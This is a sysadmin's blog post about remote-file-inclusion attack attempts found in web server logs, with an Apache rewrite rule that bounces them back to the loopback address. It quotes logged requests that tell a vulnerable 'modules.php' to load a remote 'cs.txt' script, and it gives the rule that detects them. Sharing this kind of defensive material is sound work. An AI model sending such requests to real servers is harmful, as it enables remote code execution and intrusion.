How to frustrate a trojan bot script


While doing some regular maintance on some websites I manage, I came across some interesting entries in the logs for one of our servers. Hundreds and hundreds of the following types of requests, originating from a wide variety of IP's:

GET /modules.php?op=http://cherrygirl.h18.ru/images/cs.txt?
GET /modules.php?op=http://amyru.h18.ru/images/cs.txt? 

Basically, there are a bunch of 'infected' web servers out there which are trying to get our server to execute code stored in a file on a remote server. The file in the cases above is named 'cs.txt'. You can see the contents of the script/file by reading Dan Langille's sanitized version of the attack script.

While our server was not vulnerable to the attack, I was getting very annoyed with having to respond to the script each time it hit our server with a request. Our server had to run some code, determine that the page didn't exist, produce a page that a normal user would see explaining why their request could not be completed, etc. Then it hit me. Why are we spending all this precious cpu time for these attackers? Why not have them waste their own cpu time? And that's when I decided that the attack script should attack itself. In simple terms, when our web server notices an attack coming in, it simply redirects the request to the originating server. In essence, it's like requesting a webpage from a server, being told that the page has moved and be given a new address to go to. In this case, the new address is http://127.0.0.1. Without getting too technical, that's called a Loopback Address and is a network standard which always points to yourself.

Here's what I put in the Apache webserver httpd.conf file, which is the configuration file for the Apache web server on the Linux server I wanted to modify:

RewriteEngine on
RewriteCond %{QUERY_STRING} cs.txt? [NC]
RewriteRule ^.*$ http://127.0.0.1 [R=301,L]

So now, whenever a request comes in which contains the string 'cs.txt?' in the URL request, I inform the requester that the file they are requesting has been permanently moved to 'http://127.0.0.1', the loopback address and in essence, itself.

While the hits on the server continue, I have noticed they have slowed down, I'm assuming because the remote server is busy talking to itself for a moment. I also have the satisfaction of knowing our server isn't wasting its time with these trojan hits, and letting them talk to themselves for a bit instead. 

  1. No comments yet.

You must be logged in to post a comment.